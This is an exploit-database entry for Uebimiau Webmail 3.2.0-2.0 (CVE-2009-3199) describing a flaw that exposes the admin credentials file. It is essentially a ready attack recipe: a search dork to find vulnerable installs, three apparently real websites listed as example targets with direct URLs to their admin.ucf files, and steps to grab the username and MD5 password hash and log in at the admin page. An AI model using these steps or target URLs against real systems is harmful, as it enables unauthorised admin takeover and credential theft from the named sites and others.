Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure

Author: Septemb0x
type: webapps
platform: php
port: 
date_added: 2009-08-23  
date_updated:   
verified: 1  
codes: OSVDB-58240;CVE-2009-3199  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9493.txt  

##################################################
[+]Script Name : Uebimiau Webmail v3.2.0-2.0
[+]Bug Type : Arbitrary Admins Database Disclosure Vulnerability
[+]D0rk : "Uebimiau Webmail v3.2.0-2.0"
[+]Author : Septemb0x
[+]Greetz : BHDR & BARCOD3 & MUHADRAM  - Thanks : www.gonulerleri.org
[+]Note :  Tüm Müslüman Camiasına Hayırlı Ramazanlar Dilerim...
##################################################
[+]Examples :

1.  http://ifcacareer.com/mail/inc/database/system_admin/admin.ucf
2.  http://krunt.org/webmail/inc/database/system_admin/admin.ucf
3.  http://www.hostsalive.com/webmail/inc/database/system_admin/admin.ucf
##################################################
[+]EXPLOIT ; http://[Target]/[path]/inc/database/system_admin/admin.ucf
[+]GET ; username:password(md5)
[+]LOGIN ; http://[Target]/[path]/admin/login.php
##################################################

# milw0rm.com [2009-08-24]